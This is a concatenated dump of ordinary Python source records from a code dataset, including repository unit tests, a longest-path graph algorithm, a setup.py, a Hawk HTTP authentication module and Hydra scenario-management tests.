\"../../data/\")\n for file_name in os.listdir(my_dir):\n if file_name.startswith(\"players_test\"):\n os.remove(os.path.join(my_dir, file_name))\n\n def test_saves_object(self):\n player = Player(\"John\", \"Doe\")\n player = self.repository.save(player)\n self.assertTrue(hasattr(player, 'pk'))\n self.assertEqual(player.pk, self.sequence.get_current())\n\n def test_updates_existing_object(self):\n player = Player(\"John\", \"Doe\")\n player = self.repository.save(player)\n self.assertEqual(player.name, \"John\")\n player.name = \"John1\"\n self.repository.save(player)\n updated_player = self.repository.sync(player)\n self.assertEqual(updated_player.name, \"John1\")\n self.assertEqual(updated_player.pk, player.pk)\n\n def test_save_all(self):\n players = [Player(\"John1\", \"Doe1\"), Player(\"John2\", \"Doe2\"), Player(\"John3\", \"Doe3\"), Player(\"John4\", \"Doe4\")]\n self.repository.save_all(players)\n for player in players:\n self.assertTrue(hasattr(player, 'pk'))\n self.assertNotEqual(player.pk, 0)\n\n def test_get_by_id(self):\n player = Player(\"IdTest\", \"Test\")\n self.repository.save(player)\n retrieved_player = self.repository.get_by_id(player.pk)\n self.assertEqual(player.pk, retrieved_player.pk)\n self.assertEqual(player.name, retrieved_player.name)\n self.assertEqual(player.surname, retrieved_player.surname)\n\n def test_get_by_id_throws_exception_given_nonexistent_id(self):\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.get_by_id, 100500)\n\n def test_get_all(self):\n self.remove_test_db_files()\n self.repository.refresh_persistence()\n players = [Player(\"John1\", \"Doe1\"), Player(\"John2\", \"Doe2\"), Player(\"John3\", \"Doe3\"), Player(\"John4\", \"Doe4\"),\n Player(\"John5\", \"Doe5\")]\n self.repository.save_all(players)\n retrieved_players = self.repository.get_all()\n self.assertEqual(len(players), len(retrieved_players))\n\n def test_delete_by_id(self):\n player = Player(\"John\", \"Doe\")\n self.repository.save(player)\n self.repository.delete_by_id(player.pk)\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.get_by_id, player.pk)\n\n def test_delete_by_id_throws_exception_given_nonexistent_id(self):\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.delete_by_id, 100500)\n\n def test_sync(self):\n player = Player(\"Sync\", \"Sync\")\n self.repository.save(player)\n not_synced_player = Player(\"John\", \"Doe\", player.pk)\n synced_player = self.repository.sync(not_synced_player)\n self.assertEqual(player.pk, synced_player.pk)\n self.assertEqual(player.name, synced_player.name)\n self.assertEqual(player.surname, synced_player.surname)\n\n def test_sync_throws_exception_given_obj_with_nonexistent_id(self):\n player = Player(\"Sync\", \"Sync\", 100500)\n self.assertRaises(PersistentObjectDoesNotExists, self.repository.sync, player)\n\n def test_sync_returns_none_given_non_persistent_obj(self):\n player = Player(\"Sync\", \"Sync\")\n synced_player = self.repository.sync(player)\n self.assertIsNone(synced_player)\n","repo_name":"CAPSLOCKFURY/cybernetics_hw","sub_path":"tests/db_tests/test_shelve_repository.py","file_name":"test_shelve_repository.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23795893866","text":"# Following is complete algorithm for finding longest distances.\n# 1) Initialize dist[] = {NINF, NINF, ….} and dist[s] = 0 where s is the source vertex. 
Here NINF means negative infinite.\n# 2) Create a topological order of all vertices.\n# 3) Do following for every vertex u in topological order.\n# ………..Do following for every adjacent vertex v of u\n# ………………if (dist[v] < dist[u] + weight(u, v))\n# ………………………dist[v] = dist[u] + weight(u, v)\n\n# A recursive function used by longestPath. See below\n# link for details\n# https:#www.geeksforgeeks.org/topological-sorting/\ndef topologicalSortUtil(v):\n global Stack, visited, adj\n visited[v] = True\n\n # Recur for all the vertices adjacent to this vertex\n # list::iterator i\n for i in adj[v]:\n if (not visited[i[0]]):\n topologicalSortUtil(i[0])\n\n # Push current vertex to stack which stores topological\n # sort\n Stack.append(v)\n\n# The function to find longest distances from a given vertex.\n# It uses recursive topologicalSortUtil() to get topological\n# sorting.\n\n\ndef longestPath(s):\n global Stack, visited, adj, V\n dist = [-10**9 for i in range(V)]\n\n # Call the recursive helper function to store Topological\n # Sort starting from all vertices one by one\n for i in range(V):\n if (visited[i] == False):\n topologicalSortUtil(i)\n # print(Stack)\n\n # Initialize distances to all vertices as infinite and\n # distance to source as 0\n dist[s] = 0\n # Stack.append(1)\n\n # Process vertices in topological order\n while (len(Stack) > 0):\n\n # Get the next vertex from topological order\n u = Stack[-1]\n del Stack[-1]\n # print(u)\n\n # Update distances of all adjacent vertices\n # list::iterator i\n if (dist[u] != 10**9):\n for i in adj[u]:\n # print(u, i)\n if (dist[i[0]] < dist[u] + i[1]):\n dist[i[0]] = dist[u] + i[1]\n\n # Print calculated longest distances\n # print(dist)\n for i in range(V):\n print(\"INF \", end=\"\") if (dist[i] == -\n 10**9) else print(dist[i], end=\" \")\n\n\n# Driver code\nif __name__ == '__main__':\n V, Stack, visited = 6, [], [False for i in range(7)]\n adj = [[] for i in range(7)]\n\n # Create a graph given in the above diagram.\n # Here vertex numbers are 0, 1, 2, 3, 4, 5 with\n # following mappings:\n # 0=r, 1=s, 2=t, 3=x, 4=y, 5=z\n adj[0].append([1, 5])\n adj[0].append([2, 3])\n adj[1].append([3, 6])\n adj[1].append([2, 2])\n adj[2].append([4, 4])\n adj[2].append([5, 2])\n adj[2].append([3, 7])\n adj[3].append([5, 1])\n adj[3].append([4, -1])\n adj[4].append([5, -2])\n\n s = 1\n print(\"Following are longest distances from source vertex \", s)\n longestPath(s)\n\n # This code is contributed by mohit kumar 29.\n","repo_name":"zyune/CS5800_algorithem","sub_path":"assignment5_other_graph_agorithem/longest_path_in_dag.py","file_name":"longest_path_in_dag.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"12495158221","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nDISTNAME = \"cornel-movie-dialogs-corpus-storm\"\nDESCRIPTION = \"A set of python modules for cornel movie-dialogs corpus with storm\"\nwith open(\"README.rst\") as f:\n LONG_DESCRIPTION = f.read()\nAUTHOR = \"Sosuke Kato\"\nAUTHOR_EMAIL = \"snoopies.drum@gmail.com\"\nURL = \"https://github.com/sosuke-k/cornel-movie-dialogs-corpus-storm\"\nLICENSE = \"MIT\"\nPACKAGES = [\"mdcorpus\"]\nPACKAGE_DIR = {\"mdcorpus\": \"mdcorpus\"}\nSCRIPTS = [\"scripts/generate-mdcorpus-database.py\"]\n\nimport mdcorpus\nVERSION = mdcorpus.__version__\n\n\ndef setup_package():\n metadata = dict(name=DISTNAME,\n description=DESCRIPTION,\n author=AUTHOR,\n 
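# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the longest-path file above: its recursive
# topological sort can hit Python's recursion limit on deep graphs; an
# iterative Kahn-style ordering avoids that.
#
#   from collections import deque
#   def topo_order(n, edges):                 # edges as (u, v, weight)
#       indeg, adj = [0] * n, [[] for _ in range(n)]
#       for u, v, _w in edges:
#           adj[u].append(v); indeg[v] += 1
#       q = deque(i for i in range(n) if indeg[i] == 0)
#       order = []
#       while q:
#           u = q.popleft(); order.append(u)
#           for v in adj[u]:
#               indeg[v] -= 1
#               if indeg[v] == 0: q.append(v)
#       return order
# ---------------------------------------------------------------------------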
author_email=AUTHOR_EMAIL,\n license=LICENSE,\n url=URL,\n version=VERSION,\n long_description=LONG_DESCRIPTION,\n packages=PACKAGES,\n package_dir=PACKAGE_DIR,\n scripts=SCRIPTS,\n )\n\n setup(**metadata)\n\n\nif __name__ == \"__main__\":\n setup_package()\n","repo_name":"sosuke-k/cornel-movie-dialogs-corpus-storm","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"17710460196","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nURL = \"http://datamall2.mytransport.sg/ltaodataservice/BusArrivalv2\"\n\nACCOUNT_KEY = os.getenv(\"ACCOUNT_KEY\")\nHEADERS = {\n \"AccountKey\": ACCOUNT_KEY \n}\n\n\nDIRECTUS_URL = \"http://directus:8055\"\nTOKEN = os.getenv(\"TOKEN\")\nDIRECTUS_HEADER = {\n \"Authorization\": f\"Bearer {TOKEN}\",\n 'Content-Type': 'application/json'\n}\n\nFIELD_NAMES = ['ServiceNo', 'NextBus_EstimatedArrival', 'NextBus_Latitude',\n 'NextBus_Longitude', 'NextBus_Load', 'NextBus_Type',\n 'NextBus2_EstimatedArrival', 'NextBus2_Latitude', 'NextBus2_Longitude',\n 'NextBus2_Load', 'NextBus2_Type', 'NextBus3_EstimatedArrival',\n 'NextBus3_Latitude', 'NextBus3_Longitude', 'NextBus3_Load',\n 'NextBus3_Type', 'Timestamp', 'NextBus_EstimatedArrivalDuration',\n 'NextBus2_EstimatedArrivalDuration',\n 'NextBus3_EstimatedArrivalDuration', 'BusStopCode']","repo_name":"weifeng1994/bus_data_collection","sub_path":"src/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23533947224","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport binascii\nimport codecs\nimport hashlib\nimport hmac\nimport math\nfrom six.moves import xrange\nfrom six.moves.urllib.parse import urlparse\nfrom six import text_type\n\nimport mohawk\nfrom requests.auth import AuthBase\n\n\nclass HawkAuth(AuthBase):\n \"\"\"Handles authentication using Hawk.\n\n :param hawk_session:\n The hawk session, from the server, encoded as hexadecimal.\n You don't need to set this parameter if you already know the hawk\n credentials (Optional).\n\n :param credentials:\n Python dict containing credentials information, with keys for \"id\",\n \"key\" and \"algorithm\" (Optional).\n\n :param server_url:\n The url of the server, this is useful for hawk when signing the requests.\n In case this is omited, fallbacks to the value of the \"Host\" header of\n the request (Optional).\n\n\n Note that the `hawk_session` and `credentials` parameters are mutually\n exclusive. 
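# ---------------------------------------------------------------------------
# Illustrative usage sketch for the class documented here (credential values
# are placeholders):
#
#   import requests
#   auth = HawkAuth(credentials={"id": "my-id", "key": "my-secret",
#                                "algorithm": "sha256"})
#   requests.get("https://example.org/resource", auth=auth)
# ---------------------------------------------------------------------------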
You should set one or the other.\n\n \"\"\"\n def __init__(self, hawk_session=None, credentials=None, server_url=None):\n if ((credentials, hawk_session) == (None, None)\n or (credentials is not None and hawk_session is not None)):\n raise AttributeError(\"You should pass either 'hawk_session' \"\n \"or 'credentials'.\")\n\n elif hawk_session is not None:\n try:\n hawk_session = codecs.decode(hawk_session, 'hex_codec')\n except binascii.Error as e:\n raise TypeError(e)\n keyInfo = 'identity.mozilla.com/picl/v1/sessionToken'\n keyMaterial = HKDF(hawk_session, \"\", keyInfo, 32*2)\n credentials = {\n 'id': codecs.encode(keyMaterial[:32], \"hex_codec\"),\n 'key': codecs.encode(keyMaterial[32:64], \"hex_codec\"),\n 'algorithm': 'sha256'\n }\n self.credentials = credentials\n\n if server_url is not None:\n self.host = urlparse(server_url).netloc\n else:\n self.host = None\n\n def __call__(self, r):\n if self.host is not None:\n r.headers['Host'] = self.host\n\n sender = mohawk.Sender(\n self.credentials,\n r.url,\n r.method,\n content=r.body or '',\n content_type=r.headers.get('Content-Type', '')\n )\n\n r.headers['Authorization'] = sender.request_header\n return r\n\n\ndef HKDF_extract(salt, IKM, hashmod=hashlib.sha256):\n \"\"\"HKDF-Extract; see RFC-5869 for the details.\"\"\"\n if salt is None:\n salt = b\"\\x00\" * hashmod().digest_size\n if isinstance(salt, text_type):\n salt = salt.encode(\"utf-8\")\n return hmac.new(salt, IKM, hashmod).digest()\n\n\ndef HKDF_expand(PRK, info, L, hashmod=hashlib.sha256):\n \"\"\"HKDF-Expand; see RFC-5869 for the details.\"\"\"\n if isinstance(info, text_type):\n info = info.encode(\"utf-8\")\n digest_size = hashmod().digest_size\n N = int(math.ceil(L * 1.0 / digest_size))\n assert N <= 255\n T = b\"\"\n output = []\n for i in xrange(1, N + 1):\n data = T + info + chr(i).encode(\"utf-8\")\n T = hmac.new(PRK, data, hashmod).digest()\n output.append(T)\n return b\"\".join(output)[:L]\n\n\ndef HKDF(secret, salt, info, size, hashmod=hashlib.sha256):\n \"\"\"HKDF-extract-and-expand as a single function.\"\"\"\n PRK = HKDF_extract(salt, secret, hashmod)\n return HKDF_expand(PRK, info, size, hashmod)\n\n\n# If httpie is installed, register the hawk plugin.\ntry:\n\n from httpie.plugins import AuthPlugin\n\n class HawkPlugin(AuthPlugin):\n\n name = 'Hawk Auth'\n auth_type = 'hawk'\n description = ''\n\n def get_auth(self, id, key):\n kwargs = {}\n if key == '':\n kwargs['hawk_session'] = id\n else:\n kwargs['credentials'] = {\n 'id': id,\n 'key': key,\n 'algorithm': 'sha256'\n }\n return HawkAuth(**kwargs)\n\nexcept ImportError:\n pass\n","repo_name":"magopian/requests-hawk","sub_path":"requests_hawk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"21010103045","text":"import server\nimport datetime\nimport copy\nimport logging\nimport json\nimport hydra_base\nfrom hydra_base import HydraError, JSONObject, Dataset\nfrom hydra_base.util.hydra_dateutil import ordinal_to_timestamp, timestamp_to_ordinal\nlog = logging.getLogger(__name__)\n\nclass ScenarioTest(server.SoapServerTest):\n \n def get_scenario(self, scenario_id):\n \"\"\"\n Utility function wrapper for a function that's called regularly\n Introduced as the JSONObject wrapper can be controlled more easily\n \"\"\"\n return JSONObject(hydra_base.get_scenario(scenario_id, user_id=self.user_id))\n\n def clone_scenario(self, scenario_id):\n \"\"\"\n Utility function wrapper for a 
function that's called regularly.\n        Introduced as the JSONObject wrapper can be controlled more easily\n        \"\"\"\n        return JSONObject(hydra_base.clone_scenario(scenario_id, user_id=self.user_id))\n\n    def test_update(self):\n\n        network = self.create_network_with_data()\n\n        scenario = network.scenarios[0]\n        scenario_id = scenario.id\n\n        resource_scenario = scenario.resourcescenarios[0]\n        resource_attr_id = resource_scenario.resource_attr_id\n\n        dataset = Dataset(dict(\n            type = 'descriptor',\n            name = 'Max Capacity',\n            unit = 'metres / second',\n            dimension = 'number of units per time unit',\n            value = 'I am an updated test!',\n        ))\n\n        new_resource_scenario = hydra_base.add_data_to_attribute(scenario_id, resource_attr_id, dataset, user_id=self.user_id)\n\n        assert new_resource_scenario.value.value == 'I am an updated test!', \"Value was not updated correctly!!\"\n\n    def test_add_scenario(self):\n        \"\"\"\n        Test adding a new scenario to a network.\n        \"\"\"\n        network = self.create_network_with_data()\n\n        new_scenario = copy.deepcopy(network.scenarios[0])\n        new_scenario.id = -1\n        new_scenario.name = 'Scenario 2'\n        new_scenario.description = 'Scenario 2 Description'\n        new_scenario.start_time = datetime.datetime.now()\n        new_scenario.end_time = new_scenario.start_time + datetime.timedelta(hours=10)\n        new_scenario.time_step = \"1 day\"\n\n        node_attrs = network.nodes[0].attributes\n\n        #This is an example of 3 different kinds of data\n        #A simple string (Descriptor)\n        #A time series, where the value may be a 1-D array\n        #A multi-dimensional array.\n        descriptor = self.create_descriptor(node_attrs[0], \"new_descriptor\")\n        timeseries = self.create_timeseries(node_attrs[1])\n\n        for r in new_scenario.resourcescenarios:\n            if r.resource_attr_id == node_attrs[0].id:\n                r.value = descriptor['value']\n            elif r.resource_attr_id == node_attrs[1].id:\n                r.value = timeseries['value']\n\n        scenario = JSONObject(hydra_base.add_scenario(network.id, new_scenario, user_id=self.user_id))\n\n        assert scenario is not None\n        assert len(scenario.resourcegroupitems) > 0\n        assert len(scenario.resourcescenarios) > 0\n\n\n    def test_update_scenario(self):\n        \"\"\"\n        Test updating an existing scenario.\n        \"\"\"\n        network = self.create_network_with_data()\n\n        #Create the new scenario\n        scenario = network.scenarios[0]\n        scenario.name = 'Updated Scenario'\n        scenario.description = 'Updated Scenario Description'\n        scenario.start_time = datetime.datetime.now()\n        scenario.end_time = scenario.start_time + datetime.timedelta(hours=10)\n        scenario.time_step = \"1 day\"\n\n        #Identify 2 nodes to play around with -- the first and last in the list.\n        node1 = network.nodes[0]\n        node2 = network.nodes[-1]\n\n        #Identify 1 resource group item to edit (the last one in the list).\n        item_to_edit = scenario.resourcegroupitems[-1]\n        #Just checking that we're not changing an item that is already\n        #assigned to this node..\n        assert scenario.resourcegroupitems[-1].node_id != node2.node_id\n        scenario.resourcegroupitems[-1].node_id = node2.node_id\n\n        descriptor = self.create_descriptor(node1.attributes[0],\n                                            \"updated_descriptor\")\n\n        for resourcescenario in scenario.resourcescenarios:\n            if resourcescenario.attr_id == descriptor['attr_id']:\n                resourcescenario.value = descriptor['value']\n\n        updated_scenario = JSONObject(hydra_base.update_scenario(scenario, user_id=self.user_id))\n\n        assert updated_scenario is not None\n        assert updated_scenario.id == scenario.id\n        assert updated_scenario.name == scenario.name\n        assert updated_scenario.description == 
scenario.description\n assert \"%.2f\"%updated_scenario.start_time == \"%.2f\"%timestamp_to_ordinal(scenario.start_time)\n assert \"%.2f\"%updated_scenario.end_time == \"%.2f\"%timestamp_to_ordinal(scenario.end_time)\n assert updated_scenario.time_step == scenario.time_step\n assert len(updated_scenario.resourcegroupitems) > 0\n for i in updated_scenario.resourcegroupitems:\n if i.item_id == item_to_edit.id:\n assert i.node_id == node2.node_id\n assert len(updated_scenario.resourcescenarios) > 0\n\n for data in updated_scenario.resourcescenarios: \n if data.attr_id == descriptor['attr_id']:\n assert data.value.value == descriptor['value']['value']\n\n def test_get_dataset_scenarios(self):\n \"\"\"\n Test to get the scenarios attached to a dataset\n \"\"\"\n\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n rs = scenario.resourcescenarios\n \n dataset_id_to_check = rs[0].value.id\n\n dataset_scenarios = [JSONObject(s) for s in hydra_base.get_dataset_scenarios(dataset_id_to_check, user_id=self.user_id)]\n\n assert len(dataset_scenarios) == 1\n\n assert dataset_scenarios[0].id == scenario.id\n \n clone = self.clone_scenario(scenario.id)\n new_scenario = self.get_scenario(clone.id)\n\n dataset_scenarios = [JSONObject(s) for s in hydra_base.get_dataset_scenarios(dataset_id_to_check, user_id=self.user_id)]\n\n assert len(dataset_scenarios) == 2\n\n assert dataset_scenarios[0].id == scenario.id\n assert dataset_scenarios[1].id == new_scenario.id\n\n def test_update_resourcedata(self):\n \"\"\"\n Test updating an existing scenario data.\n 2 main points to test: 1: setting a value to null should remove\n the resource scenario\n 2: changing the value should create a new dataset\n \"\"\"\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n num_old_rs = len(scenario.resourcescenarios)\n \n #Identify 2 nodes to play around with -- the first and last in the list.\n node1 = network.nodes[0]\n node2 = network.nodes[-1]\n\n descriptor = self.create_descriptor(node1.attributes[0], \n \"updated_descriptor\")\n\n val_to_delete = node2.attributes[0]\n \n rs_to_update = []\n updated_dataset_id = None\n for resourcescenario in scenario.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n updated_dataset_id = resourcescenario.value['id']\n resourcescenario.value = descriptor['value']\n rs_to_update.append(resourcescenario)\n elif ra_id == val_to_delete['id']:\n resourcescenario.value = None\n rs_to_update.append(resourcescenario)\n \n assert updated_dataset_id is not None\n\n new_resourcescenarios = [JSONObject(rs) for rs in hydra_base.update_resourcedata(scenario.id, rs_to_update, user_id=self.user_id)]\n\n assert len(new_resourcescenarios) == 1\n\n for rs in new_resourcescenarios: \n if rs.resource_attr_id == descriptor['resource_attr_id']:\n assert rs.value.value == descriptor['value']['value']\n\n updated_scenario = self.get_scenario(scenario.id)\n\n num_new_rs = len(updated_scenario.resourcescenarios)\n assert num_new_rs == num_old_rs - 1\n\n\n for u_rs in updated_scenario.resourcescenarios:\n for rs in new_resourcescenarios:\n if u_rs.resource_attr_id == rs.resource_attr_id:\n assert str(u_rs.value) == str(rs.value)\n break\n\n def test_update_resourcedata_single_dataset_update_and_delete(self):\n \"\"\"\n Test to ensure update_resourcedata does not update other\n datasets that it should not.\n \"\"\"\n network = 
self.create_network_with_data()\n\n        scenario_1 = network.scenarios[0]\n        scenario_2 = self.clone_scenario(scenario_1.id)\n        scenario_2 = self.get_scenario(scenario_2.id)\n\n        new_value = json.dumps({\"index\": {\"1.0\":\"test\", \"2.0\":\"update\"}})\n\n        #Delete a timeseries from one scenario, so there's only 1 reference to that\n        #dataset in tResourceScenario.\n        ts_to_delete = []\n        ra_id = None\n        ts_id = None\n        for rs in scenario_1.resourcescenarios:\n            if rs.value.type == 'timeseries':\n                ra_id = rs.resource_attr_id\n                ts_id = rs.value.id\n                rs.value = None\n                ts_to_delete.append(rs)\n                break\n\n        ts_to_update = []\n        for rs in scenario_2.resourcescenarios:\n            if rs.resource_attr_id == ra_id:\n                rs.value.value = new_value\n                ts_to_update.append(rs)\n                break\n\n        deleted_rs = JSONObject(hydra_base.update_resourcedata(scenario_1.id,\n                                                               ts_to_delete, user_id=self.user_id))\n        updated_ts_rs = JSONObject(hydra_base.update_resourcedata(scenario_2.id,\n                                                                  ts_to_update, user_id=self.user_id))\n        scenario_2_updated_1 = self.get_scenario(scenario_2.id)\n        for rs in scenario_2_updated_1.resourcescenarios:\n            if rs.resource_attr_id == ra_id:\n                assert json.loads(rs.value.value) == json.loads(new_value)\n                #Either the dataset is the same dataset, just updated or the dataset\n                #has been removed and linked to a previous dataset, which must have a lower ID.\n                assert rs.value.id <= ts_id\n                break\n        else:\n            raise Exception(\"Couldn't find resource scenario. Something went wrong.\")\n\n    def test_update_resourcedata_consistency(self):\n        \"\"\"\n        Test to ensure update_resourcedata does not update other\n        datasets that it should not.\n        \"\"\"\n        network = self.create_network_with_data()\n\n        scenario_1 = network.scenarios[0]\n        scenario_2 = self.clone_scenario(scenario_1.id)\n        scenario_2 = self.get_scenario(scenario_2.id)\n\n        #Identify 2 nodes to play around with -- the first and last in the list.\n        node1 = network.nodes[0]\n\n        descriptor = self.create_descriptor(node1.attributes[0],\n                                            \"updated_descriptor\")\n\n        rs_to_update = self._get_rs_to_update(scenario_1, descriptor)\n\n        #Update the value\n        new_resourcescenarios = [JSONObject(rs) for rs in hydra_base.update_resourcedata(scenario_1.id,\n                                                            rs_to_update, user_id=self.user_id)]\n\n        rs_1_id = None\n        updated_scenario_1 = self.get_scenario(scenario_1.id)\n        for u_rs in updated_scenario_1.resourcescenarios:\n            for rs in new_resourcescenarios:\n                if u_rs.resource_attr_id == rs.resource_attr_id:\n                    assert str(u_rs.value) == str(rs.value)\n                    rs_1_id = u_rs.value\n                    break\n\n        scalar = self.create_descriptor(node1.attributes[0], 200)\n\n        rs_to_update = self._get_rs_to_update(scenario_2, scalar)\n\n        new_resourcescenarios = hydra_base.update_resourcedata(scenario_2.id,\n                                                               rs_to_update, user_id=self.user_id)\n        rs_2_id = None\n        #Check that scenario 2 has been updated correctly.\n        updated_scenario_2 = self.get_scenario(scenario_2.id)\n        for u_rs in updated_scenario_2.resourcescenarios:\n            for rs in new_resourcescenarios:\n                if u_rs.resource_attr_id == rs.resource_attr_id:\n                    rs_2_id = u_rs.value\n                    assert str(u_rs.value) == str(rs.value)\n                    break\n        log.critical(\"%s vs %s\", rs_1_id, rs_2_id)\n        #Check that this change has not affected scenario 1\n        for u_rs in updated_scenario_1.resourcescenarios:\n            for rs in new_resourcescenarios:\n                if u_rs.resource_attr_id == rs.resource_attr_id:\n                    assert str(u_rs.value) != str(rs.value)\n                    break\n\n    def _get_rs_to_update(self, scenario, rs):\n        \"\"\"\n        Given a scenario, fetch all the RS which match the attribute ID\n        of the rs passed in. 
These will be updated in an update call.\n \"\"\"\n rs_to_update = []\n updated_dataset_id = None\n for resourcescenario in scenario.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == rs['resource_attr_id']:\n updated_dataset_id = resourcescenario.value['id']\n resourcescenario.value = rs['value']\n rs_to_update.append(resourcescenario)\n\n assert updated_dataset_id is not None\n\n return rs_to_update\n\n def test_get_attributes_for_resource(self):\n \"\"\"\n Test to check leng's questions about this not working correctly.\n \"\"\"\n network = self.create_network_with_data()\n\n #Create the new scenario\n scenario = network.scenarios[0] \n node1 = network.nodes[0]\n\n ra_to_update = node1.attributes[0].id\n \n updated_val = None\n\n rs_to_update = []\n for resourcescenario in scenario.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == ra_to_update:\n updated_val = resourcescenario.value.value\n resourcescenario.value.name = 'I am an updated dataset name'\n rs_to_update.append(resourcescenario)\n \n hydra_base.get_attributes_for_resource(network.id, scenario.id, 'NODE', [node1.id], user_id=self.user_id)\n\n hydra_base.update_resourcedata(scenario.id, rs_to_update)\n\n new_node_data = [JSONObject(d) for d in hydra_base.get_attributes_for_resource(network.id, scenario.id, [node1.id], user_id=self.user_id)]\n\n for new_val in new_node_data:\n if new_val.resourcescenario.value.value == updated_val:\n assert new_val.resourcescenario.value.name == 'I am an updated dataset name'\n\n def test_bulk_update_resourcedata(self):\n \"\"\"\n Test updating scenario data in a number of scenarios at once.\n 2 main points to test: 1: setting a value to null should remove\n the resource scenario\n 2: changing the value should create a new dataset\n \"\"\"\n network1 = self.create_network_with_data()\n scenario1_to_update = network1.scenarios[0] \n clone = self.clone_scenario(network1.scenarios[0].id)\n scenario2_to_update = self.get_scenario(clone.id)\n\n #Identify 2 nodes to play around with -- the first and last in the list.\n node1 = network1.nodes[0]\n node2 = network1.nodes[-1]\n\n descriptor = self.create_descriptor(node1.attributes[0], \n \"updated_descriptor\")\n\n val_to_delete = node2.attributes[0]\n \n rs_to_update = []\n updated_dataset_id = None\n for resourcescenario in scenario1_to_update.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n updated_dataset_id = resourcescenario.value['id']\n resourcescenario.value = descriptor['value']\n rs_to_update.append(resourcescenario)\n elif ra_id == val_to_delete['id']:\n resourcescenario.value = None\n rs_to_update.append(resourcescenario)\n \n assert updated_dataset_id is not None\n \n scenario_ids = []\n scenario_ids.append(scenario1_to_update.id)\n scenario_ids.append(scenario2_to_update.id)\n\n result = hydra_base.bulk_update_resourcedata(scenario_ids, rs_to_update, user_id=self.user_id)\n\n assert result == \"OK\" \n\n updated_scenario1_data = self.get_scenario(scenario1_to_update.id)\n updated_scenario2_data = self.get_scenario(scenario2_to_update.id)\n \n for rs in updated_scenario1_data.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n assert rs.value == descriptor['value']\n for rs in updated_scenario2_data.resourcescenarios:\n ra_id = resourcescenario.resource_attr_id\n if ra_id == descriptor['resource_attr_id']:\n assert rs.value == descriptor['value']\n\n\n\n def 
test_bulk_add_data(self):\n\n        data = []\n\n        dataset1 = Dataset()\n\n        dataset1.type = 'timeseries'\n        dataset1.name = 'my time series'\n        dataset1.unit = 'feet cubed'\n        dataset1.dimension = 'cubic capacity'\n\n        t1 = datetime.datetime.now()\n        t2 = t1+datetime.timedelta(hours=1)\n        t3 = t1+datetime.timedelta(hours=2)\n\n        t1 = t1.strftime(self.fmt)\n        t2 = t2.strftime(self.fmt)\n        t3 = t3.strftime(self.fmt)\n\n        val_1 = 1.234\n        val_2 = 2.345\n        val_3 = 3.456\n\n        ts_val = json.dumps({0: {t1: val_1,\n                                 t2: val_2,\n                                 t3: val_3}})\n        dataset1.value = ts_val\n        data.append(dataset1)\n\n        dataset2 = Dataset()\n        dataset2.type = 'descriptor'\n        dataset2.name = 'Max Capacity'\n        dataset2.unit = 'metres / second'\n        dataset2.dimension = 'number of units per time unit'\n\n        dataset2.value = 'I am an updated test!'\n\n        data.append(dataset2)\n\n        new_datasets = [Dataset(d) for d in hydra_base.bulk_insert_data(data, user_id=self.user_id)]\n\n        assert len(new_datasets) == 2, \"Data was not added correctly!\"\n\n\n    def test_clone(self):\n\n        network = self.create_network_with_data()\n\n        assert len(network.scenarios) == 1, \"The network should have only one scenario!\"\n\n        #self.create_constraint(network)\n\n        network = JSONObject(hydra_base.get_network(network.id, user_id=self.user_id))\n\n        scenario = network.scenarios[0]\n        scenario_id = scenario.id\n\n        clone = self.clone_scenario(scenario_id)\n        new_scenario = self.get_scenario(clone.id)\n\n\n        updated_network = JSONObject(hydra_base.get_network(new_scenario.network_id, user_id=self.user_id))\n\n\n        assert len(updated_network.scenarios) == 2, \"The network should have two scenarios!\"\n\n        assert updated_network.scenarios[1].resourcescenarios is not None, \"Data was not cloned!\"\n\n        scen_2_val = updated_network.scenarios[1].resourcescenarios[0].value.id\n        scen_1_val = network.scenarios[0].resourcescenarios[0].value.id\n\n        assert scen_2_val == scen_1_val, \"Data was not cloned correctly\"\n\n\n        # scen_1_constraint = network.scenarios[0].constraints.Constraint[0].value\n        #scen_2_constraint = updated_network.scenarios[1].constraints.Constraint[0].value\n#\n        # assert scen_1_constraint == scen_2_constraint, \"Constraints did not clone correctly!\"\n\n        scen_1_resourcegroupitems = network.scenarios[0].resourcegroupitems\n        scen_2_resourcegroupitems = updated_network.scenarios[1].resourcegroupitems\n\n        assert len(scen_1_resourcegroupitems) == len(scen_2_resourcegroupitems)\n\n        return updated_network\n\n    def test_compare(self):\n\n        network = self.create_network_with_data()\n\n        assert len(network.scenarios) == 1, \"The network should have only one scenario!\"\n\n        # self.create_constraint(network)\n\n        network = JSONObject(hydra_base.get_network(network.id, user_id=self.user_id))\n\n        scenario = network.scenarios[0]\n        scenario_id = scenario.id\n\n        clone = self.clone_scenario(scenario_id)\n        new_scenario = self.get_scenario(clone.id)\n\n        # self.create_constraint(network, constant=4)\n\n        